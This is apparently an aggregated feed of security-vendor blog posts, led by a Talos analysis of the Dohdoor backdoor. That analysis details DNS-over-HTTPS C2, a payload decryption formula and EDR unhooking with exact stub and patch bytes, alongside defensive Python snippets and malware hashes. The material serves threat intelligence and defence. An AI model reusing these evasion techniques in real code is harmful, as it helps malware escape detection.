This month in security with Tony Anscombe – February 2026 edition

In this roundup, Tony looks at how opportunistic threat actors are taking advantage of weak authentication, unmanaged exposure, and popular AI tools

WeLiveSecurity – Read More

Start using a new app and you’ll often be asked to grant it permissions. But blindly accepting them could expose you to serious privacy and security risks.

WeLiveSecurity – Read More

In a previous post, we walked through a practical example of how threat attribution helps in incident investigations. We also introduced the Kaspersky Threat Attribution Engine (KTAE) — our tool for making an educated guess about which specific APT group a malware sample belongs to. To demonstrate it, we used the Kaspersky Threat Intelligence Portal — a cloud-based tool that provides access to KTAE as part of our comprehensive Threat Analysis service, alongside a sandbox and a non-attributing similarity-search tool. The advantages of a cloud service are obvious: clients don’t need to invest in hardware, install anything, or manage any software. However, as real-world experience shows, the cloud version of an attribution tool isn’t for everyone…

First, some organizations are bound by regulatory restrictions that strictly forbid any data from leaving their internal perimeter. For the security analysts at these firms, uploading files to a third-party service is out of the question. Second, some companies employ hardcore threat hunters who need a more flexible toolkit — one that lets them work with their own proprietary research alongside Kaspersky’s threat intelligence. That’s why KTAE is available in two flavors: a cloud-based version and an on-prem deployment.

First off, the local version of KTAE ensures an investigation stays fully confidential. All the analysis takes place right in the organization’s internal network. The threat intelligence source is a database deployed inside the company perimeter; it is packed with the unique indicators and attribution data of every malicious sample known to our experts; and it also contains the characteristics pertaining to legitimate files to exclude false-positive detections. The database gets regular updates, but it operates one-way: no information ever leaves the client’s network.

Additionally, the on-prem version of KTAE gives experts the ability to add new threat groups to the database and link them to malware samples they discovered on their own. This means that subsequent attribution of new files will account for the data added by internal researchers. This allows experts to catalog their own unique malware clusters, work with them, and identify similarities.



Here’s another handy expert tool: our team has developed a free plugin for IDA Pro, a popular disassembler, for use with the local version of KTAE.

For a SOC analyst on alert triage, attributing a malicious file found in the infrastructure is straightforward: just upload it to KTAE (cloud or on-prem) and get a verdict, like Manuscrypt (83%). That’s sufficient for taking adequate countermeasures against that group’s known toolkit and assessing the overall situation. A threat hunter, however, might not want to take that verdict at face value. Alternatively, they might ask, “Which code fragments are unique across all the malware samples used by this group?” Here an attribution plugin for a disassembler comes in handy.

Inside the IDA Pro interface, the plugin highlights the specific disassembled code fragments that triggered the attribution algorithm. This doesn’t just allow for a more expert-level deep dive into new malware samples; it also lets researchers refine attribution rules on the fly. As a result, the algorithm — and KTAE itself — keeps evolving, making attribution more accurate with every run.

The plugin is a script written in Python. To get it up and running you need IDA Pro. Unfortunately, it won’t work in IDA Free, since it lacks support for Python plugins. If you don’t have Python installed yet, you’d need to grab that, set up the dependencies (check the requirements file in our GitHub repository), and make sure IDA Pro environment variables are pointing to the Python libraries.

Next, you’d need to insert the URL for your local KTAE instance into the script body and provide your API token (which is available on a commercial basis) — just like it’s done in the example script described in the KTAE documentation.

Then you can simply drop the script into your IDA Pro plugins folder and fire up the disassembler. If you’ve done it right, then, after loading and disassembling a sample, you’ll see the option to launch the Kaspersky Threat Attribution Engine (KTAE) plugin under Edit → Plugins.

When the plugin is installed, here’s what happens under the hood: the file currently loaded in IDA Pro is sent via API to the locally installed KTAE service, at the URL configured in the script. The service analyzes the file, and the analysis results are piped right back into IDA Pro.

On a local network, the script usually finishes its job in a matter of seconds (the duration depends on the connection to the KTAE server and the size of the analyzed file). Once the plugin wraps up, a researcher can start digging into the highlighted code fragments. A double-click leads straight to the relevant section in the assembly or binary code (Hex view) for analysis. These extra data points make it easy to spot shared code blocks and track changes in a malware toolkit.

To learn more about the Kaspersky Threat Attribution Engine and how to deploy it, check out the official product documentation. And to arrange a demonstration or piloting project, please fill out the form on the Kaspersky website.

Kaspersky official blog – Read More

Welcome to this week’s edition of the Threat Source newsletter.

“‘Tis dangerous to take a cold, to sleep, to drink; but I tell you, my lord fool, out of this nettle, danger, we pluck this flower, safety.” – Hotspur, Shakespeare’s Henry IV, Part 1: Act 2 Scene 3

I get it. Hotspur is the quintessential hothead, and we all understand his place in the story. He’s famous for his fiery temperament and impatience with anything that smells of caution or compromise. Hotspur’s whole deal is that you have to take risks if you want to achieve anything worthwhile, but he’s not wrong… at least not fully. Anyone who has been in this field for a while has seen risks lead to disaster and risks lead to success. There is no silver bullet and there is no black and white.

Wait, am I talking about Henry IV and cybersecurity? Yes. Yes, I am, but stick with me and I bet it will make sense to you, as well.

The speed at which all sides have taken on the monumental task of leveraging AI is a paradigm shift, but as we go forward, run into potholes, and see simple avoidable mistakes, I’m reminded that all of this is cyclical. While this feels insurmountable at times, the reality is that the baseline is already starting to be met. Useful outcomes and capabilities are highlighting that the answer is still finding the smartest people in the room. If you know me at all, you’ve heard the axiom, “If you’re the smartest person in the room you’re in the wrong room.” That’s how I got to Talos (now I just hope that they don’t remember that I’m here). If you continue to find the smartest people in the room and surround yourself with them, you will find that peer group full of ideas in this paradigm-shifting era. Allow those ideas to plant seeds in your mind, take a few risks, and let them grow. Use some of these tools (responsibly) in ways that you don’t think will work. You learn from your failures, so take the chance to fail.

I have been using AI to teach myself Golang and Rust by having it convert my clunky Perl and Python scripts and broken or questionable proofs of concept into those languages. Sometimes it’s very smooth and works flawlessly, which in turn has made it harder for me to learn, but sometimes I hit the jackpot and it’s a mess. Those messes have taught me the most while frustrating me to new heights. All of this has provided me with new directions to explore.

While it’s overwhelming to read each new story on security flaws found in tools, stories on the latest “hallucinated” errors, and the latest vibe-coded disaster, it’s important to remember that NIMDA happened. Code Red existed. The ILOVEYOU virus walked so that MyDoom could run. Sapphire/Slammer walloped networks, doubling in size every 8.5 seconds. Hotspur contends that we MUST take risks to gain security. In the end, he dies at Hal’s hands (429-year spoiler alert!) because Hal has patiently grown into the mantle of leadership and finds that he wears it well. I’d say that we stand to learn from both of them: take some risks, but continue to be patient and learn the nuance of these new tools, both their capabilities and pitfalls, remembering all the while that this is all new, but we’ve been here before.

“The past is so much safer, because whatever’s in it has already happened. It can’t be changed; so, in a way, there’s nothing to dread.” – Margaret Atwood

Cisco Talos identified a campaign by UAT-10027, ongoing since December 2025, that uses a new backdoor we call “Dohdoor”. Dohdoor leverages DNS-over-HTTPS (DoH) for stealthy command-and-control (C2) communications and can download and execute additional payloads within legitimate Windows processes. The campaign targets the education and health care sectors in the US, using phishing, PowerShell scripts, and DLL sideloading, with C2 infrastructure hidden behind reputable services like Cloudflare.

This threat demonstrates sophisticated techniques that evade traditional security controls, posing risks to organizations with sensitive data such as schools and hospitals. Dohdoor’s use of legitimate Windows tools and encrypted communications makes detection and response challenging. The campaign’s overlap with known APT tactics indicates a high level of adversary skill and persistence. The targeting of critical sectors raises the stakes for potential disruption and data theft.

Security teams should make sure their detection tools are up-to-date with the latest ClamAV and SNORT® signatures we share in the blog. It’s important to keep an eye out for unusual DoH traffic and monitor legitimate Windows tools being used in unexpected ways. Reviewing endpoint logs for signs of anti-forensic activity and process hollowing can help spot infections early. Finally, sharing threat intelligence and best practices with other organizations in your sector can strengthen defenses and improve response to similar threats.

Operation Red Card 2.0 leads to 651 arrests in Africa

In December and January, law enforcement officers from 16 African countries worked with Interpol and private companies to disrupt some major cybercriminal operations. (DarkReading)

PayPal data breach led to fraudulent transactions

Notification letters revealed that the cybersecurity incident was caused by an error in the PayPal Working Capital loan application. The personal information of a “small number of customers” was exposed for nearly six months. (SecurityWeek)

Former L3Harris Trenchant boss jailed for selling hacking tools to Russian broker

Williams was the general manager of the Trenchant division, which sells hacking and surveillance tools to the U.S. government and Five Eyes. (TechCrunch)

Conduent data breach grows

The spillover from a ransomware attack on one of the largest government contractors in the United States keeps getting bigger: More than 25 million people have now had personal data stolen in the hack. (TechCrunch)

Spitting cash: ATM jackpotting attacks surged in 2025

In 2025, criminals cracked 700 ATMs across the U.S., marking a surprising spike in ATM attacks, according to the FBI, which has recorded around 1,900 incidents since 2020. (DarkReading)

Active exploitation of Cisco Catalyst SD-WAN by UAT-8616

Cisco Talos is tracking the active exploitation of CVE-2026-20127, a vulnerability in Cisco Catalyst SD-WAN Controller, formerly vSmart, that allows an unauthenticated remote attacker to bypass authentication and obtain administrative privileges.

“Good enough” emulation: Fuzzing a single thread to uncover vulnerabilities

A Talos researcher used targeted emulation of the Socomec DIRIS M-70 gateway’s Modbus thread to uncover six patched vulnerabilities, showcasing efficient tools and methods for IoT security testing.

SHA256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610

MD5: 85bbddc502f7b10871621fd460243fbc

Talos Rep: https://talosintelligence.com/talos_file_reputation?s=41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610

Example Filename: 85bbddc502f7b10871621fd460243fbc.exe

Detection Name: W32.41F14D86BC-100.SBX.TG

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

Example Filename: https_2915b3f8b703eb744fc54c81f4a9c67f.exe

Detection Name: Win.Worm.Coinminer::1201

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974

MD5: aac3165ece2959f39ff98334618d10d9

Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974

Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe

Detection Name: W32.Injector:Gen.21ie.1201

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59

MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a

Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59

Example Filename: d4aa3e7010220ad1b458fac17039c274_64_Dll.dll

Detection Name: Auto.90B145.282358.in02

SHA256: d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

MD5: 0c883b1d66afce606d9830f48d69d74b

Talos Rep: https://talosintelligence.com/talos_file_reputation?s=d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

Example Filename: d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1.exe

Detection Name: Win.Worm.Zard::95.sbx.tg
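
The SHA256 values listed above can be compared against files on disk with a few lines of Python. This is a minimal sketch rather than a scanning tool: the function names are hypothetical, and the set contains only the five hashes from this list.

```python
import hashlib

# SHA256 values copied from the prevalent-malware list above.
KNOWN_SHA256 = {
    "41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610",
    "9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507",
    "96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974",
    "90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59",
    "d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1",
}


def sha256_of_file(path: str, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so large files are not loaded into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_listed(path: str) -> bool:
    """Return True if the file's SHA256 appears in the list above."""
    return sha256_of_file(path) in KNOWN_SHA256
```

A match on a hash is a strong signal, but the absence of a match says nothing about whether a file is safe.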

Cisco Talos Blog – Read More

The European Union Agency for Cybersecurity (ENISA) released its updated cybersecurity exercise methodology, providing organizations and governments across Europe with a structured framework for planning, executing, and evaluating cybersecurity exercises. Designed to be both practical and theoretically robust, this methodology offers an end-to-end approach to enhancing preparedness against cyber threats while ensuring alignment with major European regulations, including NIS2 and the EU Cybersecurity Act.

The ENISA methodology serves as a blueprint for organizations seeking to strengthen their cyber resilience. It is specifically crafted for cybersecurity professionals, organizational planners, and government entities aiming to:

By offering a combination of theoretical insights, lessons learned from past exercises, and industry best practices, ENISA equips planners with a framework that ensures the right stakeholders and expertise are involved at the appropriate stages. This framework is complemented by a practical support toolkit containing templates, checklists, and guiding materials to streamline the planning process.

The methodology is intentionally designed to be flexible while maintaining compliance with established standards such as ISO 22398:2013 and ISO 22361:2022. Its alignment with European regulations, including NIS2, the EU Cybersecurity Act, the Cyber Resilience Act, the Digital Operational Resilience Act, and the GDPR, ensures that exercises do not simply simulate threats but also test an organization’s regulatory readiness. This dual focus on operational effectiveness and compliance is increasingly vital in a landscape where cyberattacks can have both technical and legal consequences.

The ENISA cybersecurity exercise methodology rests on several foundational principles:

ENISA’s approach divides a cybersecurity exercise into six critical phases, guiding organizations from conceptualization to post-exercise evaluation. Each phase is supplemented by the support toolkit to ensure exercises are realistic, actionable, and aligned with organizational goals. Key components include:

Organizations that adopt the ENISA methodology gain measurable benefits. Structured planning reduces preparation time and prevents common oversights, while the evaluation framework helps translate exercise outcomes into actionable improvements. By integrating the methodology with NIS2 and the EU Cybersecurity Act, planners can also demonstrate compliance with regulators and build internal confidence in cyber readiness.

Furthermore, the methodology encourages a culture of continuous improvement. Lessons identified in one exercise feed directly into future scenarios, enhancing resilience over time. The support from ENISA’s workshops and expert community ensures that even complex national-level exercises can draw on shared expertise and practical insights.

The ENISA cybersecurity exercise methodology is more than a theoretical guide; it is a practical framework that empowers organizations to prepare and respond to cyber threats systematically. Its integration with the EU Cybersecurity Act, NIS2, and other EU directives ensures exercises serve both operational and regulatory objectives. By combining structured planning, flexible execution, and a supportive community ecosystem, ENISA enables organizations to strengthen cyber resilience, improve regulatory compliance, and continuously evolve their cybersecurity posture.

The post ENISA’s Updated Cybersecurity Methodology Aligns with NIS2 and EU Cybersecurity Act appeared first on Cyble.

Cyble – Read More

Talos discovered a multi-stage attack campaign targeting victims in the education and health care sectors, predominantly in the United States.

The campaign involves a multi-stage attack chain, where initial access is likely achieved through phishing. The infection chain executes a PowerShell script that downloads and runs a Windows batch script from a remote staging server. The batch script then downloads a malicious Windows dynamic-link library (DLL), dubbed Dohdoor, which is disguised as a legitimate Windows DLL file, and executes it by sideloading it into a legitimate Windows executable. Once activated, Dohdoor uses the DNS-over-HTTPS (DoH) technique to resolve command-and-control (C2) domains through Cloudflare’s DNS service. Using the resolved IP address, it establishes an HTTPS tunnel to the Cloudflare edge network, which effectively serves as a front for the concealed C2 infrastructure. Dohdoor then provides backdoor access to the victim’s environment, enabling the threat actor to download the next-stage payload, potentially a Cobalt Strike Beacon, directly into the victim machine’s memory and execute it reflectively within legitimate Windows processes.

In this campaign, the threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address. This obfuscation is further reinforced by subdomain names such as “MswInSofTUpDloAd” and “DEEPinSPeCTioNsyStEM”, which mimic Microsoft Windows software updates or a security appliance check-in to evade automated detections. Additionally, irregular capitalization across non-traditional top-level domains (TLDs) like “.OnLiNe”, “.DeSigN”, and “.SoFTWARe” not only bypasses string-matching filters but also aids adversarial infrastructure redundancy by preventing a single blocklist entry from neutralizing the intrusion.
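
One defensive takeaway from the mixed-case hostnames is that blocklist matching should normalize case before comparing. The following is a minimal sketch under stated assumptions: the function names are hypothetical, and the `example-bad.*` entries are placeholders, not indicators from this campaign.

```python
def normalize_host(host: str) -> str:
    """Lowercase a hostname and drop a trailing dot so comparisons ignore case."""
    return host.strip().rstrip(".").lower()


def is_blocked(host: str, blocklist: set[str]) -> bool:
    """Return True if the host, or any parent domain of it, is in the blocklist."""
    labels = normalize_host(host).split(".")
    # Check the full name, then each parent: a.b.c -> a.b.c, b.c, c
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


# Placeholder entries, normalized once when the blocklist is built.
BLOCKLIST = {normalize_host(d) for d in ["Example-Bad.Online", "example-bad.design"]}
```

With this approach, `is_blocked("MswInSofTUpDloAd.ExAmPlE-BaD.OnLiNe", BLOCKLIST)` matches the same entry as the all-lowercase spelling, because DNS names are case-insensitive.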

Talos discovered suspicious download activity in our telemetry where the threat actor executed “curl.exe” with an encoded URL, downloading a malicious Windows batch file with the file extensions “.bat” or “.cmd”.

While the initial infection vector remains unknown, we observed several PowerShell scripts in OSINT data containing embedded download URLs similar to those identified in the telemetry. The threat actor appeared to have executed the download command via a PowerShell script that was potentially delivered to the victim through a phishing email.

The second stage component of the attack chain is a Windows batch script dropper that effectively orchestrates a DLL sideloading technique to execute the malicious DLL while simultaneously conducting anti-forensic cleanup.

This process begins by creating a hidden workspace folder in either “C:\ProgramData” or “C:\Users\Public”. It then downloads a malicious DLL from the command-and-control server using the URL /111111?sub=d and places it in the workspace under a legitimate Windows DLL file name, such as “propsys.dll” or “batmeter.dll”. The script subsequently copies legitimate Windows executables, such as “Fondue.exe”, “mblctr.exe”, and “ScreenClippingHost.exe”, into the working folder and executes them from there, using the C2 URL /111111?sub=s as the argument parameter. The legitimate executable sideloads and runs the malicious DLL. Finally, the script performs anti-forensics by deleting the Run command history from the RunMRU registry key, clearing the clipboard data, and ultimately deleting itself.

UAT-10027 downloaded and executed a malicious DLL using the DLL sideloading technique. The malicious DLL operates as a loader, which we call “Dohdoor,” and it is designed to download, decrypt, and execute malicious payloads within legitimate Windows processes. It evades detection through API obfuscation and encrypted C2 communications, and bypasses endpoint detection and response (EDR) detections.

Dohdoor is a 64-bit DLL that was compiled on Nov. 25, 2025, and contains the debug string “C:\Users\diablo\Desktop\SimpleDll\TlsClient.hpp”. Dohdoor begins execution by dynamically resolving Windows API functions using hash-based lookups rather than static imports, which evades signature-based detections that rely on the malware’s Import Address Table (IAT). Dohdoor then parses the command line arguments that the actor passed when executing the legitimate Windows executable that sideloads Dohdoor. It extracts an HTTPS URL pointing to the C2 server and a resource path specifying the type of payload to download.

Dohdoor employs stealthy domain resolution utilizing the DNS-over-HTTPS technique to effectively resolve the C2 server IP address. Rather than generating plaintext DNS queries, it securely sends encrypted DNS requests to Cloudflare’s DNS server over HTTPS port 443. It constructs DNS queries for both IPv4 (A records) and IPv6 (AAAA records) and formats them using the template strings that include the HTTP header parameters such as User-Agent: insomnia/11.3.0 and Accept: applications/dns-json, producing a complete HTTP GET request.

The formatted HTTP request is sent through encrypted connections. After receiving the JSON response from the Cloudflare DNS servers, Dohdoor parses it by searching for specific patterns rather than using a full JSON parser. It searches for the string “Answer” to locate the answer section of the response and, if found, searches for the string “data” to locate the data field containing the IP address.
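
The substring-based parsing described above can be illustrated with a short sketch. It assumes a response shaped like Cloudflare's DoH JSON format, with an “Answer” array whose entries carry a “data” field; the function name and the sample body (using a documentation IP address) are hypothetical, and the malware's exact string handling is not known from this description.

```python
import json


def extract_ip_by_pattern(body: str):
    """Return the first "data" value after "Answer", using substring searches only."""
    answer_pos = body.find('"Answer"')
    if answer_pos == -1:
        return None  # no answer section in the response
    data_pos = body.find('"data"', answer_pos)
    if data_pos == -1:
        return None
    # The value is the next quoted string after the colon that follows "data".
    colon = body.find(":", data_pos + len('"data"'))
    if colon == -1:
        return None
    start = body.find('"', colon + 1)
    end = body.find('"', start + 1) if start != -1 else -1
    if start == -1 or end == -1:
        return None
    return body[start + 1:end]


# Hypothetical sample response for illustration only.
SAMPLE = (
    '{"Status":0,"Question":[{"name":"example.com","type":1}],'
    '"Answer":[{"name":"example.com","type":1,"TTL":300,"data":"192.0.2.10"}]}'
)

# A full JSON parser yields the same value for well-formed input.
assert extract_ip_by_pattern(SAMPLE) == json.loads(SAMPLE)["Answer"][0]["data"]
```

Pattern searching of this kind avoids shipping a JSON parser but is brittle: it returns only the first record and breaks if field order or spacing changes.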

This technique bypasses DNS-based detection systems, DNS sinkholes, and network traffic analysis tools that monitor suspicious domain lookups, ensuring that the malware’s C2 communications remain undetected by traditional network security infrastructure.

With the resolved IP address, Dohdoor establishes a secure connection to the C2 server by constructing the GET requests with the HTTP headers including “User-agent: curl/7.88” or “curl/7.83.1” and the URL /X111111?sub=s. It supports both standard HTTP responses with Content-length headers and chunked encoding.

Dohdoor receives an encrypted payload from the C2 server. The encrypted payload undergoes custom XOR-SUB decryption using a position-dependent cipher. The encrypted data maintains a 4:1 expansion ratio, meaning it is four times larger than the decrypted data. The decryption routine operates in two ways: a vectorized Single Instruction, Multiple Data (SIMD) method for bulk processing and a simpler loop that handles the remaining encrypted data.

The main decryption routine processes 16-byte blocks of the encrypted data using the SIMD instructions. It calculates position-dependent indexes, retrieves encrypted data and applies XOR-SUB decryption using the 32-byte key. This decryption routine repeats four times per iteration until it reaches the end of a 16-byte block.

For the encrypted data that remains outside the 16-byte blocks, it applies the decryption formula “decrypted[i] = encrypted[i*4] - i - 0x26”. Every fourth byte is sampled from the encrypted data buffer; the position index is subtracted to create position-dependent decryption, and finally the constant 0x26 is subtracted.
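
The tail-loop formula quoted above can be sketched in Python for analysts who want to reproduce it on captured data. This covers only that formula, not the SIMD path or the 32-byte key. Three things are assumptions: results wrap to a single byte (modulo 256), the index `i` starts at zero for the buffer passed in, and the three unused bytes in each group of four are zero in the demo encoder, which is a hypothetical inverse written only to exercise the function.

```python
def decrypt_tail(encrypted: bytes) -> bytes:
    """Apply decrypted[i] = encrypted[i*4] - i - 0x26, wrapping to one byte."""
    out = bytearray()
    for i in range(len(encrypted) // 4):
        # Sample every fourth byte, subtract the position, then the constant.
        out.append((encrypted[i * 4] - i - 0x26) & 0xFF)
    return bytes(out)


def encode_for_demo(plain: bytes) -> bytes:
    """Hypothetical inverse used only for testing; filler bytes are an assumption."""
    buf = bytearray()
    for i, value in enumerate(plain):
        buf.append((value + i + 0x26) & 0xFF)
        buf.extend(b"\x00\x00\x00")  # three unused bytes give the 4:1 ratio
    return bytes(buf)


sample = encode_for_demo(b"hello")
assert len(sample) == 4 * len(b"hello")
assert decrypt_tail(sample) == b"hello"
```

The round trip shows why the ciphertext is four times the size of the plaintext: only one byte in every four contributes to the output.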

Once the payload is decrypted, Dohdoor injects the payload binary into a legitimate Windows process using the process hollowing technique. The actor targets legitimate Windows binaries by hardcoding the executable paths, ensuring that Dohdoor executes them in a suspended state. It then performs process hollowing, injecting the decrypted payload before resuming the process so that the payload runs stealthily. In this campaign, the legitimate Windows binaries targeted for process hollowing are listed below:

Talos observed that Dohdoor implements an EDR bypass technique by unhooking system calls (syscalls) to bypass EDR products that monitor Windows API calls through user mode hooks in ntdll.dll. Security products usually patch the beginning of ntdll functions to redirect execution through their monitoring code before allowing the original system call to execute.

Evasive malware usually detects system call hooks by reading the first bytes of critical ntdll functions and comparing them against the expected syscall stub pattern that begins with “mov r10, rcx; mov eax, syscall_number”. Whether the bytes match the expected pattern (indicating the function is not hooked) or hooks are detected, the malware can write replacement code that either restores the original instructions or creates a direct syscall trampoline that bypasses the hooked function entirely.

Dohdoor achieves this by locating ntdll.dll with the hash “0x28cc” and finding NtProtectVirtualMemory with the hash “0xbc46c894”. It then reads the first 32 bytes of the function using ReadProcessMemory, which it loads dynamically during execution, and compares them with the syscall stub pattern “4C 8B D1 B8 FF 00 00 00” (hexadecimal), which corresponds to the assembly instructions “mov r10, rcx; mov eax, 0FFh”. If the byte pattern matches, it writes the 6-byte patch “B8 BB 00 00 00 C3” (hexadecimal), which corresponds to the assembly instructions “mov eax, 0BBh; ret”, creating a direct syscall stub that bypasses any user mode hooks.
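
From an analyst's point of view, the byte comparison described above amounts to checking whether a function prologue still looks like an unmodified x64 syscall stub. The sketch below works on bytes already extracted from a memory dump or a file on disk; it is an illustration of the pattern check only, and the function name is hypothetical.

```python
# "mov r10, rcx" (4C 8B D1) followed by the opcode of "mov eax, imm32" (B8).
SYSCALL_STUB_PREFIX = bytes.fromhex("4C8BD1B8")


def parse_syscall_stub(prologue: bytes):
    """Return the syscall number if the prologue matches the stub pattern, else None."""
    if len(prologue) < 8 or not prologue.startswith(SYSCALL_STUB_PREFIX):
        return None  # too short, or the first instructions were replaced
    # The 32-bit immediate after B8 is stored little-endian.
    return int.from_bytes(prologue[4:8], "little")


# The pattern quoted in the text decodes to syscall number 0xFF.
assert parse_syscall_stub(bytes.fromhex("4C 8B D1 B8 FF 00 00 00")) == 0xFF
# A prologue that starts with a relative jump (E9) does not match the stub.
assert parse_syscall_stub(bytes.fromhex("E9 10 20 30 40 90 90 90")) is None
```

Comparing prologues captured in memory against the same function in the on-disk copy of ntdll.dll is one way to spot either an EDR hook or a patch like the one described.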

During our research, we were unable to find a payload that was downloaded and implanted by Dohdoor. Still, we found that one of the C2 hosts associated with this campaign had a JA3S hash of “466556e923186364e82cbdb4cad8df2c” and the TLS certificate serial number “7FF31977972C224A76155D13B6D685E3”, according to OSINT data. The JA3S hash and the serial number resemble those of the default Cobalt Strike server, indicating that the threat actor was potentially using the Cobalt Strike beacon as the payload to establish a persistent connection to the victim network and execute further payloads.
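
For context, a JA3S fingerprint is the MD5 digest of a comma-separated string built from the TLS version, the chosen cipher suite, and the extension list in the Server Hello, with extensions joined by hyphens and all values in decimal. A minimal sketch of that calculation follows; the function name is hypothetical, and the field values in the test line are illustrative rather than those observed on the C2 host.

```python
import hashlib


def ja3s_fingerprint(tls_version: int, cipher: int, extensions: list[int]) -> str:
    """Build the JA3S string (version,cipher,ext-ext-...) and return its MD5 hex digest."""
    ext_part = "-".join(str(ext) for ext in extensions)
    ja3s_string = f"{tls_version},{cipher},{ext_part}"
    return hashlib.md5(ja3s_string.encode("ascii")).hexdigest()


# Illustrative values only: TLS 1.2 (771), one cipher suite, three extensions.
fingerprint = ja3s_fingerprint(771, 49199, [65281, 0, 11])
assert fingerprint == hashlib.md5(b"771,49199,65281-0-11").hexdigest()
```

Because the fingerprint depends only on how the server answers, many servers running the same software with default settings share one JA3S value, which is why a match is suggestive rather than conclusive.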

Talos assesses with low confidence that UAT-10027 is North Korea-nexus, based on similarities between its tactics, techniques, and procedures (TTPs) and those of the known North Korean APT actor Lazarus.

We observed similarities in the technical characteristics of Dohdoor with Lazarloader, a tool belonging to the North Korean APT Lazarus. The key similarity noted is the usage of a custom XOR-SUB with the position-dependent decryption technique and the specific constant in hexadecimal (0x26) for subtraction operation. Additionally, the NTDLL unhooking technique used to bypass EDR monitoring by identifying and restoring system call stubs aligns with features found in earlier Lazarloader variants.

The implementation of DNS-over-HTTPS (DoH) via Cloudflare’s DNS service to circumvent traditional DNS security, the process hollowing technique to reflectively execute the decrypted payload in targeted legitimate Windows binaries like ImagingDevices.exe, and the sideloading of malicious DLLs under disguised file names such as “propsys.dll” have all been observed in the tradecraft of the North Korean APT actor Lazarus.

In addition to the observed similarities in the tools’ technical characteristics, the use of multiple top-level domains (TLDs) including “.design”, “.software”, and “.online”, with varying case patterns, also aligns with the operational preferences of Lazarus. While UAT-10027’s malware shares technical overlaps with the Lazarus Group, the campaign’s focus on the education and health care sectors deviates from Lazarus’ typical profile of cryptocurrency and defense targeting. However, Talos has historically seen North Korean APT actors target the health care sector using Maui ransomware, and another North Korean APT group, Kimsuky, has targeted the education sector, highlighting the overlaps in the victimology of UAT-10027 with that of other North Korean APTs.

The following ClamAV signature detects and blocks this threat:

The following SNORT® Rules (SIDs) detect and block this threat:

The IOCs for this threat are also available in our GitHub repository.

Cisco Talos Blog – Read More







Security teams don’t lack alerts; they lack fast, reliable context for decision-making. When threat analysis and intelligence are not an integrated part of the SOC workflow, investigations slow down, MTTR grows, and the risk of missed incidents increases. Adding behavioral analysis and live intelligence directly into SIEM closes this gap, turning monitoring, triage, and response into faster, higher-ROI processes.

That’s exactly how ANY.RUN’s integration with Splunk Enterprise brings value to security teams.

The ANY.RUN integration embeds behavioral analysis and live threat intelligence directly into Splunk Enterprise as native data sources.

Instead of exporting reports or attaching external files, analysis results and intelligence data are ingested as structured Splunk events. This allows them to be searched, correlated, visualized, and used in alerts and dashboards using standard SIEM mechanisms.

The integration helps SOC teams:

All components are designed to work inside existing SOC workflows. No separate consoles, no manual data transfer, no parallel processes.

As a result, malware analysis and threat enrichment become part of detection logic and investigation pipelines, not side tasks handled outside the SIEM.

The ANY.RUN Interactive Sandbox integration allows security teams to submit suspicious URLs directly from Splunk for analysis and receive structured results as native Splunk events.

Returned data includes verdict, risk score, extracted indicators, and a direct link to the full analysis session for deeper investigation. These results can immediately participate in correlation searches, alerts, dashboards, and response workflows inside the SIEM.

These improvements translate into lower investigation costs, fewer missed incidents, and more predictable incident response performance, with a 21-minute reduction in MTTR per case.

When a suspicious URL appears in a Splunk event, analysts can submit it directly to the ANY.RUN Sandbox. The analysis verdict returns as a native Splunk event and immediately participates in correlation, investigation, and response workflows.



The ANY.RUN Threat Intelligence Lookup integration enables on-demand enrichment of IPs, domains, URLs, and file hashes directly inside Splunk. The intelligence is sourced from millions of malware and phishing investigations conducted manually by 15,000+ SOC teams and 600,000+ analysts in ANY.RUN’s Interactive Sandbox.

Enrichment results are returned as structured Splunk events, including verdict, industry targeting, last seen data, tags, and a direct link to detailed intelligence in the ANY.RUN interface. This data can be searched, correlated, visualized, and incorporated into alerting logic using native SIEM capabilities.

As a result, teams improve SLA adherence, reduce average investigation time per alert, and strengthen detection accuracy with 58% more threats identified overall.

This leads to faster response, better use of existing security investments, and lower exposure to sector-specific attacks.

While reviewing an incident, analysts can enrich IPs, domains, URLs, or file hashes using TI Lookup. The contextual result is stored as a Splunk event, reducing manual research and accelerating decision-making.



The ANY.RUN Threat Intelligence Feeds integration continuously streams verified malicious network indicators (IPs, domains, URLs) into Splunk, sourced from live sandbox analyses of real-world attacks across 15,000+ organizations.

Indicators delivered via ANY.RUN TI Feeds are stored in Splunk’s Key-Value Store (KV Store), making them searchable, filterable, and immediately usable in correlation rules, dashboards, and alerting workflows.

TI Feeds contain 99% unique malicious infrastructure not present in other intelligence sources.

This improves MTTD, reduces false positive rates, and increases detection rate by 36% on average.

For the business, that means lower breach probability, reduced operational disruption, and better return on existing SIEM investments as the environment grows.

